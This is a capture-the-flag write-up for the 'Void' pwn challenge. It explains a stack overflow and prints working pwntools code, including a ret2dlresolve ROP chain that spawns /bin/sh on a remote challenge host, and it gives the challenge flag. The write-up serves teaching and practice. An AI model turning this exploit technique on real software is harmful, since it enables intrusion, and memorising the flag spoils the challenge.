Pwn - Void

Medium

Description

The room goes dark and all you can see is a damaged terminal. Hack into it to restore the power and find your way out.

Downloads

865KB

pwn_void.zip

archive

Solution

checksec output

The binary is very simple with a vuln() function that has a clear stack buffer overflow.

Looking at the GOT, there is only read available.

GOT

1. With no win function anywhere

2. No method like puts to leak a libc address

3. Relatively big space to hold a payload (read(0, buf, 200))

It suggest that we'll need to do a Ret2dlresolve ROP chain.

Firstly, the code to find the padding needed to control rip.

from pwn import *

binary = context.binary = ELF("./void")

p = process(binary.path)
p.sendline(cyclic(1024, n=8))
p.wait()
core = p.corefile
p.close
os.remove(core.file.name)
padding = cyclic_find(core.read(core.rsp, 8), n=8)
log.info('Padding: ' + str(padding) + " (" + hex(padding) + ")")

We find the padding needed to be 72 bytes. We then, proceed with creating the dlresolve ROP chain using pwntools. While the concept is not so straight-forward, the exploit is very easily written with pwntools. The entire exploit code is as simple as such:

from pwn import *

binary = context.binary = ELF("./void")

rop = ROP(binary)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(binary, symbol='system', args=['/bin/sh'])

rop.raw('A' * 72)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)     # call .plt and dl-resolve() with the correct, calculated reloc_offset

# send payload
p = remote("178.62.64.13", 30663)

p.sendline(rop.chain())
p.sendline(dlresolve.payload)    # now the read is called and we pass all the relevant structures in

p.interactive()

Flag: HTB{r3s0lv3_th3_d4rkn355}